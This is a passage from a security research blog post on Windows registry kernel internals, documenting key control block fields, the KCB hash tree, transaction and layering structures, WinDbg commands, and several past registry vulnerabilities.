From a low-level security perspective, it's worth considering potential issues related to the reference counting. Integer overflow might seem like a possibility, but it's practically impossible due to the field's width and the additional overflow protection present in the CmpReferenceKeyControlBlock-like functions. A more realistic concern is a scenario where the kernel accidentally decrements the refcount by a larger value than the number of released references. This could lead to premature KCB deallocation and a use-after-free condition. Therefore, accurate KCB reference counting is a crucial area to investigate when researching Windows for registry vulnerabilities.
Basic key information
As mentioned earlier, one of the most important types of information in the KCB is the unique identifier of the key in the hive, consisting of the _HHIVE descriptor pointer (KeyHive) and the corresponding key cell index (KeyCell). Very frequently, the kernel uses these two members to obtain the address of the key node mapping, which resembles the following pattern in the decompiled code:
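A hedged reconstruction of that pattern (struct stand-ins reduced to the relevant fields; HvGetCell is the real routine name, stubbed out here with a trivial placeholder):

```c
#include <stdint.h>

typedef struct { void *KeyHive; uint32_t KeyCell; } KCB_SKETCH;

/* Stand-in for the kernel's HvGetCell: the real routine performs the full
 * cell map walk described earlier in this post; this placeholder simply
 * offsets into a flat in-memory hive image for illustration purposes. */
static void *HvGetCell(void *Hive, uint32_t CellIndex) {
    return (uint8_t *)Hive + CellIndex;
}

/* The recurring decompiled pattern: translate the KCB's hive pointer and
 * cell index into the virtual address of the backing _CM_KEY_NODE. */
static void *NodeFromKcb(const KCB_SKETCH *Kcb) {
    return HvGetCell(Kcb->KeyHive, Kcb->KeyCell);
}
```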
Whenever some information about a key needs to be queried based on its handle, it is generally more efficient to read it from the KCB than the key node. The reason is that a pool-based KCB access requires fewer memory fetches (it avoids the cell map walk), bypasses the context switch to the Registry process, and eliminates the potential need to page in hive data from disk. Consequently, the following types of information are cached inside KCBs:
Key name, which is stored in a public _CM_NAME_CONTROL_BLOCK structure and pointed to by the NameBlock member. Every unique key name in the system has its own instance of the _CM_NAME_CONTROL_BLOCK object, which is reference-counted and shared across all KCBs of keys with that name. This is an optimization designed to prevent storing multiple redundant copies of the same string in kernel memory.
Flags, stored in the Flags member, which is an exact copy of the _CM_KEY_NODE.Flags value. There is also the KcbUserFlags field that caches the value of _CM_KEY_NODE.UserFlags, and KcbVirtControlFlags, which caches the value of _CM_KEY_NODE.VirtControlFlags. The semantics of all of these bitmasks were discussed in Part 5.
Security descriptor, stored in a separate _CM_KEY_SECURITY_CACHE structure and pointed to by CachedSecurity.
Subkey count, stored in the SubKeyCount field. It expresses the cumulative number of the key's stable and volatile subkeys, i.e. it is equal to the sum of _CM_KEY_NODE.SubKeyCounts[0] and SubKeyCounts[1].
Value list, stored in the ValueList structure of type _CHILD_LIST, and equivalent to _CM_KEY_NODE.ValueList.
Key limits, represented by KcbMaxNameLen, KcbMaxValueNameLen and KcbMaxValueDataLen. They correspond to the key node fields with the same names without the "Kcb" prefix.
Fully qualified path, stored in FullKCBName. It is lazily initialized in the internal CmpConstructAndCacheName function, either when resolving a symbolic link, or as a result of calling the documented CmCallbackGetKeyObjectID API. A previously initialized path may be marked as stale by setting FullKCBNameStale (the least significant bit of the FullKCBName pointer).
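The stale bit works because the name allocation is at least 2-byte aligned, leaving the least significant pointer bit free. A minimal sketch of this tagged-pointer idiom (function names invented):

```cpp
#include <cassert>
#include <cstdint>

// FullKCBName points to an aligned name buffer, so its lowest bit can serve
// as the FullKCBNameStale flag without any extra storage.
inline uintptr_t MarkStale(uintptr_t FullKCBName) { return FullKCBName | 1; }

inline bool IsStale(uintptr_t FullKCBName) { return (FullKCBName & 1) != 0; }

// Mask the flag bit off before using the value as a pointer again.
inline wchar_t* GetName(uintptr_t FullKCBName) {
  return reinterpret_cast<wchar_t*>(FullKCBName & ~static_cast<uintptr_t>(1));
}
```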
It is essential for system security that the information found in KCBs is always synchronized with their key node counterparts. This is one of the most fundamental assumptions of the Windows registry implementation, and failure to guarantee it typically results in memory corruption or other severe security vulnerabilities.
Extended flags
In addition to the flags fields that simply mirror the corresponding values from the key node, like Flags, KcbUserFlags and KcbVirtControlFlags, there is also a set of extended flags that are KCB-specific. They are stored in the following fields:
+0x008 ExtFlags         : Pos 0, 16 Bits
+0x008 Freed            : Pos 16, 1 Bit
+0x008 Discarded        : Pos 17, 1 Bit
+0x008 HiveUnloaded     : Pos 18, 1 Bit
+0x008 Decommissioned   : Pos 19, 1 Bit
+0x008 SpareExtFlag     : Pos 20, 1 Bit
[...]
+0x040 DelayedDeref : Pos 0, 1 Bit
+0x040 DelayedClose : Pos 1, 1 Bit
+0x040 Parking : Pos 2, 1 Bit
For the eight explicitly defined flags, here's a brief explanation:
Freed: the KCB has been freed, but the underlying pool allocation may still be alive as part of the CmpFreeKCBListHead (older systems) or CmpKcbLookaside (Windows 10 and 11) lookaside lists.
Discarded: the KCB has been unlinked from the global KCB tree and is not available for name-based lookups, but there may still be active references to it via open handles. It is typically set for keys that have been deleted, and for old instances of keys that have been renamed.
HiveUnloaded: the underlying hive has been unloaded.
Decommissioned: the KCB is no longer used (its reference count dropped to zero) and it is ready to be freed, but it hasn't been freed just yet.
SpareExtFlag: as the name suggests, this is a spare bit that may be associated with a new flag in the future.
DelayedDeref: the key is subject to a "delayed deref" mechanism, due to having been dereferenced using CmpDelayDerefKeyControlBlock instead of CmpDereferenceKeyControlBlock. This serves to defer the actual dereferencing of the KCB by some time, anticipating its near-future need and thus avoiding a redundant free-allocate sequence.
DelayedClose: the key is subject to a "delayed close" mechanism, which is similar to delayed deref, but it involves delaying the freeing of a KCB structure even if its refcount has dropped to zero.
Parking: the purpose of this bit is unclear, and it seems to be currently unused.
Last but not least, the ExtFlags member stores a further set of flags, which can be expressed as the following enum:
enum _CM_KCB_EXT_FLAGS
{
  CM_KCB_NO_SUBKEY           = 0x1,
  CM_KCB_SUBKEY_ONE          = 0x2,
  CM_KCB_SUBKEY_HINT         = 0x4,
  CM_KCB_SYM_LINK_FOUND      = 0x8,
  CM_KCB_KEY_NON_EXIST       = 0x10,
  CM_KCB_NO_DELAY_CLOSE      = 0x20,
  CM_KCB_INVALID_CACHED_INFO = 0x40,
  CM_KCB_READ_ONLY_KEY       = 0x80,
  CM_KCB_READ_ONLY_SUBKEY    = 0x100,
};
Let's break it down:
CM_KCB_NO_SUBKEY, CM_KCB_SUBKEY_ONE, CM_KCB_SUBKEY_HINT: these flags are currently obsolete, and were originally related to an old performance optimization. CM_KCB_NO_SUBKEY indicated that the key had no subkeys. CM_KCB_SUBKEY_ONE indicated that the key had exactly one subkey, and its 32-bit hint value was stored in KCB.HashKey. Finally, CM_KCB_SUBKEY_HINT indicated that the hints of all subkeys were stored in a dynamically allocated buffer pointed to by KCB.IndexHint. According to my analysis, none of the flags seem to be used in modern versions of Windows, even though their related fields in the KCB structure still exist.
CM_KCB_SYM_LINK_FOUND: indicates that the key is a symbolic link whose target KCB has already been resolved during a previous access, and is cached in KCB.CachedChildList.RealKcb (older systems) or KCB.LinkTarget (Windows 10 and 11). It is an optimization designed to speed up the process of traversing symlinks, by performing the path lookup only once and later referring directly to the cached KCB where possible.
CM_KCB_KEY_NON_EXIST: this is another deprecated flag that existed in historical implementations of the registry, but doesn't seem to be used anymore.
CM_KCB_NO_DELAY_CLOSE: indicates that the key mustn't be subject to the "delayed close" mechanism, and instead should be freed as soon as all references to it are dropped.
CM_KCB_INVALID_CACHED_INFO: this flag simply indicates that the IndexHint/HashKey/SubKeyCount fields contain out-of-date information that shouldn't be relied on.
CM_KCB_READ_ONLY_KEY: this key is designated as read-only and, therefore, is not modifiable. The flag can be set by using the undocumented NtLockRegistryKey system call, which can only be called from kernel-mode. Shout out to James Forshaw who wrote an interesting post about it on his blog.
CM_KCB_READ_ONLY_SUBKEY: the exact meaning and usage of the flag is unclear, but it appears to be enabled for keys with at least one descendant subkey marked as read-only. Specifically, the internal CmLockKeyForWrite function (the main routine behind NtLockRegistryKey's logic) sets it iteratively for every parent key of the read-only key, up to and including the hive's root.
Key body list
To optimize performance, the KCB stores the first four key body pointers in the KeyBodyArray for fast, lockless access. The KeyBodyListHead field maintains the head of a doubly-linked list for any additional handles.
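A toy model of this bookkeeping is shown below (the real code uses interlocked operations to probe the array slots and takes a lock for the overflow list; all names beyond the two KCB fields are invented):

```cpp
#include <cassert>
#include <cstddef>
#include <list>

struct CM_KEY_BODY {};  // opaque stand-in for the real key body

struct ToyKcb {
  CM_KEY_BODY* KeyBodyArray[4] = {};    // fast, lock-free slots
  std::list<CM_KEY_BODY*> KeyBodyList;  // overflow for additional handles

  void AttachKeyBody(CM_KEY_BODY* Body) {
    // Probe the four fast slots first; the kernel does this with
    // interlocked compare-exchange rather than a plain store.
    for (size_t i = 0; i < 4; i++) {
      if (KeyBodyArray[i] == nullptr) {
        KeyBodyArray[i] = Body;
        return;
      }
    }
    // All fast slots taken: fall back to the linked list.
    KeyBodyList.push_back(Body);
  }
};
```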
KCB lock
The KcbPushlock member within the KCB structure is a lock used to synchronize access to the key during various registry system calls. It is passed to the standard kernel pushlock APIs, such as ExAcquirePushLockSharedEx, ExAcquirePushLockExclusiveEx, and ExReleasePushLockEx.
Transacted state
The key control block is central to managing the transacted state of registry keys, maintaining pending changes in memory before they are committed to the hive. Several fields within the KCB are specifically dedicated to this function:
KCBUoWListHead: This field is a list head that anchors a list of Unit of Work (UoW) structures. Each UoW represents a specific action taken within a transaction, such as creating or deleting a key, or setting or deleting a value. This list allows the system to track all pending transactional operations related to a particular key, and it is crucial for ensuring atomicity, as it records the operations that must be applied or rolled back as a single unit.
TransKCBOwner: This field is used to identify the transaction object that "owns" the key. It is set on the KCBs of transactionally created keys, and signifies that the key is currently only visible in the context of the specific transaction. Once the transaction commits, this field is cleared, and the key becomes visible in the global registry tree.
KCBLock and KeyLock: Two so-called intent locks of type _CM_INTENT_LOCK, which are used to ensure that no two transactions can be associated with a single key if their respective operations could invalidate each other's state. According to my understanding, KCBLock protects the consistency of the KCB in this regard, and KeyLock protects the key node. The !reg ixlock WinDbg command is designed to display the internal state of these locks.
TransValueCache: This field is a structure that caches value entries associated with a particular KCB, if at least one of its values has been modified in an active transaction. Before a value is set, modified or deleted within a transaction for the first time, a copy of the current value list is taken and stored here. When a transaction is committed, the TransValueCache state is applied back to the key's persistent value list. On rollback, the list is simply discarded.
TransValueListOwner: This field is a pointer to a transaction that currently "owns" the TransValueCache. At any given time, for each key, there may be at most one active transaction that has any pending operations involving the key's values.
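The TransValueCache life cycle described above can be sketched with a toy copy-on-write model (names and containers are simplified; this is not the real layout):

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <optional>
#include <string>
#include <vector>

using ValueList = std::map<std::wstring, std::vector<uint8_t>>;

struct ToyKey {
  ValueList Values;                          // persistent value list
  std::optional<ValueList> TransValueCache;  // pending transacted copy

  // First transacted modification snapshots the value list; subsequent
  // changes accumulate in the snapshot, not in the persistent list.
  void TxSetValue(const std::wstring& Name, std::vector<uint8_t> Data) {
    if (!TransValueCache) TransValueCache = Values;  // lazy copy-on-write
    (*TransValueCache)[Name] = std::move(Data);
  }

  // Commit applies the cached state back to the persistent list.
  void Commit() {
    if (TransValueCache) Values = std::move(*TransValueCache);
    TransValueCache.reset();
  }

  // Rollback simply discards the cached copy.
  void Rollback() { TransValueCache.reset(); }
};
```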
These fields collectively form the core of transaction management within the Windows registry. Ever since their introduction in Windows Vista, they need to be correctly handled as part of every registry action, whether read or write, transacted or non-transacted. This is because the kernel must potentially incorporate any transacted state into any information queries, must not allow two contradictory transactions to exist at the same time, and must not allow a non-transacted operation to break the assumptions of an active transaction without invalidating it first. Any bugs related to managing the transacted state may have significant security implications, with some interesting examples being CVE-2023-21748 and CVE-2023-23420. The specific structures used to store the transacted state, such as _CM_TRANS or _CM_KCB_UOW, are discussed in more detail in the "Transaction structures" section below.
Layered key state
Layered keys were introduced in Windows 10 version 1607 to support containerisation through differencing hives. Because overlaying hives on top of each other is primarily a runtime concept, the Key Control Block (KCB) is the natural place to hold the state related to this feature, and there are three main members involved in this process:
LayerSemantics: This 2-bit field indicates the state of a key within the layering system. It is an exact copy of the key's _CM_KEY_NODE.LayerSemantics value, cached in KCB for easier/quicker access. For a detailed overview of its possible values, please refer to Part 5.
LayerHeight: This field specifies the level of the key within the differencing hive stack. A higher LayerHeight indicates that the key is higher up in the stack of layered hives, and a value of zero is used for base hives (i.e. normal non-differencing hives loaded on the host system).
LayerInfo: This is a pointer to a _CM_KCB_LAYER_INFO structure, which describes the key's position within the stack of differencing hives. Among other things, it contains a pointer to the lower layer on the key stack, and the head of a list of layers above the current one.
The specifics of the structures associated with this functionality are discussed in the "Layered keys" section below.
KCB tree structure
While key bodies are a common way to access KCB structures, they're not the only method. They are integral when you have an open handle to a key, as operations on the handle follow the handle → key body → KCB translation path. However, looking up keys by name or path is also crucial. Whether a key is opened or created, it relies on either an existing handle and a relative path (a single subkey name or a longer path with backslash-separated names), or an absolute path starting with "\Registry\". In this scenario, the kernel needs to quickly check if a KCB exists for the given key and to obtain its address if it does. To achieve this, KCBs are organized into their own tree structure, which the kernel can traverse. The tree is rooted in CmpRegistryRootObject (specifically CmpRegistryRootObject->KeyControlBlock, as CmpRegistryRootObject itself is the key body representing the \Registry key), and mirrors the current registry layout from a high-level perspective.
Let's highlight several key points:
KCB Existence: There's no guarantee that a corresponding KCB exists for every registry key. KCBs are allocated lazily, only when a key is opened or created, or when a KCB of one of its descendants is about to be allocated (which requires the full chain of ancestor KCBs to exist).
Consistent KCB Tree Structure: The KCB tree structure is always consistent. If a KCB exists for a key, then KCBs for all its ancestors up to the root \Registry key must also exist.
Cached Information in KCBs: KCBs contain cached information from the key node, plus additional runtime information that may not yet be in the hive (e.g., pending transactions). Before performing any operation on a key, it's crucial to consult its KCB.
KCB Uniqueness: At any given time, there can be only one KCB corresponding to a specific key attached to the tree. It's possible for multiple KCBs of the same key to exist in memory, but only if some of them correspond to deleted instances, in which case they are no longer visible in the global tree (only through the handles, until they are closed). Before creating a new KCB, the kernel should always ensure that there isn't an existing one, and if there is, use it. Failing to maintain this invariant can lead to severe consequences, as illustrated by CVE-2023-23420.
KCB Tree and Hives: The KCB tree combines key descriptors from different hives and therefore must implement support for "exit nodes" and "entry nodes", as described in the previous blog post. Both exit and entry nodes have corresponding KCBs that can be viewed and analyzed in WinDbg. Resolving transitions between exit and entry nodes generally involves reading the (_HHIVE*, root cell index) pair from the exit node and then locating and navigating to the corresponding KCB in the destination hive. To speed up this process, the kernel uses an optimization that sets the CM_KCB_SYM_LINK_FOUND flag (0x8) in the exit node's KCB and stores the entry node's KCB address in KCB.LinkTarget, simulating a resolved symbolic link and avoiding the need to look up the entry's KCB every time the key is traversed. In the diagram above, entry keys are marked in blue, exit nodes in orange, and the special connection between them by the connector with black squares.
Key Depth: Every open key in the system has a depth in the global tree, representing the number of nesting levels separating it from the root. This value is stored in the TotalLevels field. For example, the root key \Registry has a depth of 1, and the key \Registry\Machine\Software\Microsoft\Windows has a depth of 5.
Parent KCB Pointer: Every initialized KCB structure (whether attached to the tree or not) contains a pointer to its parent KCB in the ParentKcb field. The only exception is the global root \Registry, for which this pointer is NULL.
Now that we understand how the KCB tree works conceptually, let's examine how it is represented in memory. Interestingly, the KCB structure itself doesn't store a list of its subkeys. Instead, it relies on a simple 32-bit hash of the text string for fast lookups by name. The hash is calculated by multiplying successive characters of the string by powers of 37, where the first character is multiplied by the highest power and the last by the lowest (37⁰, which is 1). This allows for a straightforward iterative implementation, shown below in C++ code:
uint32_t HashString(const std::string& str) {
  uint32_t hash = 0;
  for (size_t i = 0; i < str.size(); i++) {
    hash = hash * 37 + toupper(str[i]);
  }
  return hash;
}
Some example outputs of the algorithm are:
HashString("Microsoft") = 0x7f00cd26
HashString("Windows") = 0x2f7de68b
HashString("CurrentVersion") = 0x7e25f69d
To calculate the hash of a path with multiple components, the same algorithm steps are repeated. However, in this case, the hashes of the successive path parts are treated similarly to the letters in the previous example. Therefore, the following formula is used to calculate the hash of the full "Microsoft\Windows\CurrentVersion" path:

Hash = (HashString("Microsoft") × 37 + HashString("Windows")) × 37 + HashString("CurrentVersion")   (mod 2³²)
The hash value calculated for each key, based on its path relative to the hive's root, is stored in KCB.ConvKey.Hash. Consequently, the hash value for the standard system key HKLM\Software\Microsoft\Windows\CurrentVersion is 0x86a158ea.
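Putting the two steps together, the full path hash can be computed as follows (HashString as defined earlier; splitting the path into its components is assumed to happen beforehand):

```cpp
#include <cassert>
#include <cctype>
#include <cstdint>
#include <string>
#include <vector>

uint32_t HashString(const std::string& str) {
  uint32_t hash = 0;
  for (size_t i = 0; i < str.size(); i++) {
    hash = hash * 37 + std::toupper(static_cast<unsigned char>(str[i]));
  }
  return hash;
}

// Component hashes are folded together with the same multiply-by-37 scheme
// that HashString applies to individual characters.
uint32_t HashPath(const std::vector<std::string>& components) {
  uint32_t hash = 0;
  for (const std::string& part : components) {
    hash = hash * 37 + HashString(part);
  }
  return hash;
}

// HashPath({"Microsoft", "Windows", "CurrentVersion"}) → 0x86a158ea
```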
Every hive has a directory of the KCBs within it, structured as a hashmap with a fixed number of buckets. Each bucket comprises a linked list of the KCBs located there. Internally, this directory is referred to as the "KCB cache" and is represented by the following two fields in the _CMHIVE structure:
+0x670 KcbCacheTable     : Ptr64 _CM_KEY_HASH_TABLE_ENTRY
+0x678 KcbCacheTableSize : Uint4B
KcbCacheTable is a pointer to a dynamically allocated array of _CM_KEY_HASH_TABLE_ENTRY structures, and KcbCacheTableSize specifies the number of buckets (i.e., the number of elements in the KcbCacheTable array). In practice, the size of this KCB cache is 128 buckets for the virtual \Registry hive, 512 for the vast majority of hives loaded in the system, and 1024 for two specific system hives: HKLM\Software and HKLM\System. Given a specific key with a name hash denoted as ConvKey, its KCB can be found in the cache bucket indexed as follows:
// CacheIndex = <finalized ConvKey> % Hive->KcbCacheTableSize
//
// Kcb can be found in Hive->KcbCacheTable[CacheIndex]
//
The operation of translating a key's path hash to its KCB cache table index (excluding the modulo KcbCacheTableSize step) is called "finalization". There's even a WinDbg helper command that can perform this action for us: !reg finalize. We can test it on the hash we calculated for the "Microsoft\Windows\CurrentVersion" path:
0: kd> !reg finalize 0x86a158ea
Finalized Hash for Hash = 0x86a158ea : 0xc2c65312
So, the finalized hash is 0xc2c65312, and since the KCB cache size of the SOFTWARE hive is 1024 buckets, the index of the HKLM\Software\Microsoft\Windows\CurrentVersion key in the array will be the lowest 10 bits of that value, or 0x312. We can verify that our calculations are correct by finding the SOFTWARE hive in memory and listing the keys located in its individual buckets:
As we can see, our calculations have proven to be accurate. We could achieve a similar result with the !reg hashindex command, which takes the address of the _HHIVE object and the ConvKey for a given key, and then prints out information about the corresponding bucket.
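The index arithmetic itself is trivial to reproduce (the finalization step is left abstract here, since its exact algorithm is internal):

```cpp
#include <cassert>
#include <cstdint>

// The bucket index is the finalized hash reduced modulo the table size; for
// power-of-two sizes, this simply keeps the low bits (10 bits for 1024).
uint32_t CacheIndex(uint32_t FinalizedHash, uint32_t TableSize) {
  return FinalizedHash % TableSize;
}

// CacheIndex(0xc2c65312, 1024) → 0x312
```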
Within a single bucket in the KCB cache, all the KCBs are linked together in a singly-linked list starting at the _CM_KEY_HASH_TABLE_ENTRY.Entry pointer. The subsequent elements are accessible through the _CM_KEY_HASH.NextHash field, which points to the KCB.KeyHash structure in the next KCB on the list. A diagram of this data structure is shown below:
Now that we understand how the KCB objects are internally organized, let's examine how name lookups are implemented. Suppose we want to take a single step through a path and find the KCB of the next subkey based on its parent KCB and the key name. The process is as follows (assuming the parent is not an exit node):
Get the pointer to the hive descriptor on which we are currently operating from ParentKcb->KeyHive.
Calculate the hash of the subkey name based on its full path relative to the hive in which it is located.
Calculate the appropriate index in the KCB cache based on the name hash and iterate through the linked list, comparing:
The hash of the key name.
The pointer to the parent KCB.
If both of the above match, perform a full comparison of the key name. If it matches, we have found the subkey.
The process is particularly interesting because it is not based on directly iterating through the subkeys of a given key, but instead on iterating through all the keys in the particular cache bucket. Thanks to the use of hashing, the vast majority of checks of potential candidates for the sought-after subkey are reduced to a single comparison of two 32-bit numbers, making the whole process quite efficient. The performance is mostly dependent on the total number of keys in the hive and the number of hash collisions for the specific cache index.
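The steps above can be sketched with toy structures as follows (in the kernel, _CM_KEY_HASH is embedded inside the KCB and the list is traversed via CONTAINING_RECORD; a back-pointer is used here instead for simplicity):

```cpp
#include <cassert>
#include <cctype>
#include <cstdint>
#include <string>

struct ToyKcb;

// Toy cache bucket entry, loosely modeled on _CM_KEY_HASH.
struct ToyKeyHash {
  uint32_t ConvKey;       // path hash of the key
  ToyKeyHash* NextHash;   // next entry in the same cache bucket
  ToyKcb* Kcb;            // simplification of CONTAINING_RECORD
};

struct ToyKcb {
  ToyKcb* ParentKcb;
  std::string Name;       // stands in for the NameBlock
  ToyKeyHash KeyHash;
};

bool EqualsIgnoreCase(const std::string& a, const std::string& b) {
  if (a.size() != b.size()) return false;
  for (size_t i = 0; i < a.size(); i++) {
    if (toupper((unsigned char)a[i]) != toupper((unsigned char)b[i]))
      return false;
  }
  return true;
}

// One lookup step: walk the bucket, filtering on the cheap 32-bit hash and
// the parent pointer before falling back to a full name comparison.
ToyKcb* FindKcbInBucket(ToyKeyHash* Bucket, ToyKcb* Parent, uint32_t ConvKey,
                        const std::string& Name) {
  for (ToyKeyHash* e = Bucket; e != nullptr; e = e->NextHash) {
    if (e->ConvKey != ConvKey) continue;
    if (e->Kcb->ParentKcb != Parent) continue;
    if (EqualsIgnoreCase(e->Kcb->Name, Name)) return e->Kcb;
  }
  return nullptr;
}
```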
If you'd like to dive deeper into the implementation of KCB tree traversal, I recommend analyzing the internal function CmpFindKcbInHashEntryByName, which performs a single step through the tree as described above. Another useful function to analyze is CmpPerformCompleteKcbCacheLookup, which recursively searches the tree to find the deepest KCB object corresponding to one of the elements of a given path.
For those experimenting in WinDbg, here are a few useful commands related to KCBs and their trees:
!reg findkcb: This command finds the address of the KCB in the global tree that corresponds to the given fully qualified registry path, if it exists.
!reg querykey: Similar to the command above, but in addition to providing the KCB address, it also prints the hive descriptor address, the corresponding key node address, and information about subkeys and values of the given key.
!reg kcb: This command prints basic information about a key based on its KCB. Its advantage is that it translates flag names into their textual equivalents (e.g., CompressedName, NoDelete, HiveEntry, etc.), but it often doesn't provide the specific information one is looking for. In that case, it might be necessary to use the dt _CM_KEY_CONTROL_BLOCK command to dump the entire structure.
Other structures
So far, this blog post has described only a few of the most important registry structures, which are essential to know for anyone conducting research in this area. However, in total, there are over 150 different structures used in the Windows kernel and related to the registry, and only about half are documented through debug symbols or on Microsoft's website. While it's impossible to detail the operation and function of all of these structures in one article, this section aims to at least provide an overview of a majority of them, to note which of them are publicly available, and to briefly describe how they are used internally.
The layout of many structures corresponding to the most complex mechanisms is publicly unknown at the time of writing and requires significant time and energy to reconstruct. Even then, the correct meaning of each field and flag cannot be guaranteed. Therefore, the information below should be used with caution and verified against the specific Windows version(s) in question before relying on it in any way.
Key opening/creation
In PDB | Structure name | Description
❌ | Parse context
Given that the registry is integrated with the standard Windows object model, all operations on registry paths (both absolute and relative) must be performed through the standard NT Object Manager interface.
For example, the NtCreateKey syscall calls the CmCreateKey helper function. At this point, there are no further calls into the Configuration Manager; instead, there is a call to ObOpenObjectByNameEx (a more advanced version of ObOpenObjectByName). Several levels down, the kernel transfers execution back to the registry code, specifically to the CmpParseKey callback, which is the entry point responsible for handling all path operations (i.e., all key open/create actions). This means that the CmCreateKey and CmpParseKey functions, which work together, cannot pass an arbitrary number of input and output arguments to each other. They only have one pointer (ParseContext) at their disposal, which can serve as a communication channel. Thus, the agreement between these functions is that the pointer points to a special "parse context" structure, which has three main roles:
Pass the input configuration of a given operation, e.g. information about:
operation mode (open/create),
transactionality of the operation,
following of symbolic links,
flags related to WOW64 functionality,
optional class data of the created key.
Pass some return information, such as whether the key was opened or created,
Cache certain information within a single "parse" request, e.g.:
information on whether registry virtualization is enabled for a given process,
when following a symbolic link, a pointer to the originating hive descriptor, in order to check whether the given transition is allowed within the hive trust class,
when following a symbolic link, a pointer to the KCB of its target (or the closest possible ancestor).
Reconstructing the layout of this structure is a critical step in getting a better understanding of how the key opening/creation process works internally.
❌ | Path info
When a client references a key by name, one of the first actions taken by the CmpParseKey function (or more specifically, CmpDoParseKey) is to take the string representing that name (absolute or relative), break it into individual parts separated by backslashes, and calculate the 32-bit hashes for each of them. This ensures that parsing only occurs once and doesn't need to be repeated. The structure where the result of this operation is stored is called "path info".
According to the documentation, a single registry path reference can contain a maximum of 32 levels of nesting. Therefore, the path info structure allows for the storage of 32 elements, in the following way: the first 8 elements are present directly within the structure, and if the path is deeply nested, an additional 24 elements are placed in a supplementary structure allocated on demand from the kernel pools. The functions that operate on this object are CmpComputeComponentHashes, CmpExpandPathInfo, CmpValidateComponents, CmpGetComponentNameAtIndex, CmpGetComponentHashAtIndex, and CmpCleanupPathInfo.
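A hypothetical reconstruction of this layout, based purely on the description above (all names invented):

```cpp
#include <cassert>
#include <cstdint>
#include <string>
#include <utility>
#include <vector>

// 8 components stored inline, with room for 24 more allocated on demand,
// giving the documented maximum of 32 levels of nesting.
constexpr size_t kInlineComponents = 8;
constexpr size_t kExpandedComponents = 24;

struct Component {
  std::wstring Name;
  uint32_t Hash;
};

struct PathInfo {
  size_t Count = 0;
  Component Inline[kInlineComponents];
  std::vector<Component> Expanded;  // stands in for the on-demand pool buffer

  void Append(Component c) {
    assert(Count < kInlineComponents + kExpandedComponents);
    if (Count < kInlineComponents) {
      Inline[Count] = std::move(c);
    } else {
      Expanded.push_back(std::move(c));  // CmpExpandPathInfo-style overflow
    }
    Count++;
  }

  const Component& At(size_t i) const {
    return i < kInlineComponents ? Inline[i] : Expanded[i - kInlineComponents];
  }
};
```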
Interestingly, I discovered an off-by-one bug in the CmpComputeComponentHashes function, which allows an attacker to write 25 values into the 24-element array. However, due to a fortunate coincidence, path info structures are allocated from a special lookaside list with allocation sizes significantly larger than the length of the structure itself. As a result, this buffer overflow is not exploitable in practice, which has also been confirmed by Microsoft. More information about this issue, as well as the reversed definition of this structure, can be found in my original report.
Key notifications
In PDB | Structure name | Description
✅ | _CM_NOTIFY_BLOCK
The first time RegNotifyChangeKeyValue or the underlying NtNotifyChangeMultipleKeys syscall is called on a given handle, a notify block structure is assigned to the corresponding key body object. This structure serves as the central control point for all notification requests made on that handle in the future. It also stores the configuration defined in the initial API call, which, once set, cannot be changed without closing and reopening the key. This is in line with the official MSDN documentation:
"This function should not be called multiple times with the same value for the hKey but different values for the bWatchSubtree and dwNotifyFilter parameters. The function will succeed but the changes will be ignored. To change the watch parameters, you must first close the key handle by calling RegCloseKey, reopen the key handle by calling RegOpenKeyEx, and then call RegNotifyChangeKeyValue with the new parameters."
The !reg notifylist command in WinDbg can list all active notify blocks in the system, allowing you to check which keys are currently being monitored for changes.
❌ | Post block
Each post block object corresponds to a single wait for changes to a given key. Many post block objects can be assigned to one notify block object at the same time. The network of relationships in this structure becomes even more complex when using the NtNotifyChangeMultipleKeys syscall with a non-empty SubordinateObjects argument, in which case two separate post blocks share a third data structure (the so-called post block union). However, the details of this topic are beyond the scope of this post.
The WinDbg !reg postblocklist command allows you to see how many active post blocks are assigned to each process/thread, but unfortunately, it does not show any detailed information about their contents.
Registry callbacks
In PDB | Structure name | Description
✅ | REG_*_INFORMATION
These structures are used for supplying callbacks with precise information about operations performed on the registry, and are part of the documented Windows interface. Consequently, not only their definitions but also detailed descriptions of the meaning of each field are published directly by Microsoft. A complete list of these structures can be found on MSDN, e.g., on the EX_CALLBACK_FUNCTION callback function (wdm.h) page.
However, I have found in my research that in addition to the official registry callback interface, there is also a less official extension that Microsoft uses internally in VRegDriver, the module that supports differencing hives. If a given client, instead of using the official CmRegisterCallbackEx function, calls the internal CmpRegisterCallbackInternal function with the fifth argument set to 1, this callback will be internally marked as "extended". Extended callbacks, in addition to the information provided by the standard structures, also receive a handful of additional information related to differencing hives and layered keys. At the time of writing, the differences occur in the structures representing the RegNtPreLoadKey, RegNtPreCreateKeyEx, RegNtPreOpenKeyEx actions and their "post" counterparts.
❌ | Callback descriptor
The structure represents a single registry callback registered through the CmRegisterCallback or CmRegisterCallbackEx API. Once allocated, it is attached to a doubly-linked list represented by the global CallbackListHead object.
❌ | Object context descriptor
A descriptor structure for a key body-specific context that can be assigned through the CmSetCallbackObjectContext API. This descriptor is then inserted into a linked list that starts at _CM_KEY_BODY.ContextListHead.
❌ | Callback context
An internal structure used in the CmpCallCallBacksEx function to store the current state during the callback invocation process. For example, it's used to invoke the appropriate "post" type callbacks in case of an error in one of the "pre" type callbacks. These objects are freed by the dedicated CmpFreeCallbackContext function, which additionally caches a certain number of allocations in the global CmpCallbackContextSList list. This allows future requests for objects of this type to be quickly fulfilled.
Registry virtualization
In PDB | Structure name | Description
❌ | Replication stack
A core task of registry virtualization is the replication of keys, which involves creating an identical copy of a given key structure. This occurs under the path HKU\<SID>_Classes\VirtualStore when an application, subject to virtualization, attempts to create a key in a location where it lacks proper permissions. The entire operation is coordinated by the CmpReplicateKeyToVirtual function and consists of two main stages. First, a "replication stack" object is created and initialized in the CmpBuildVirtualReplicationStack function. This object specifies the precise key structure to be created within the virtualization process. Second, the actual creation of these keys based on this object occurs within the CmpDoBuildVirtualStack function.
Transactions
In PDB | Structure name | Description
✅ | _KTRANSACTION
A structure corresponding to a KTM transaction object, which is created by the CreateTransaction function or its low-level equivalent NtCreateTransaction.
❌ | Lightweight transaction object
A direct counterpart of _KTRANSACTION, but for lightweight transactions, created by the NtCreateRegistryTransaction system call. It is very simple and only consists of a bitmask of the current transaction state, a push lock for synchronization, and a pointer to the corresponding _CM_TRANS object.
✅ | _CM_KCB_UOW
The structure represents a single, active transactional operation linked to a specific key. In some scenarios, one logical operation corresponds to one such object (e.g., the UoWSetSecurityDescriptor type). In other cases, multiple UoWs are created for a single operation (e.g., UoWAddThisKey assigned to a newly created key, and UoWAddChildKey assigned to its parent).
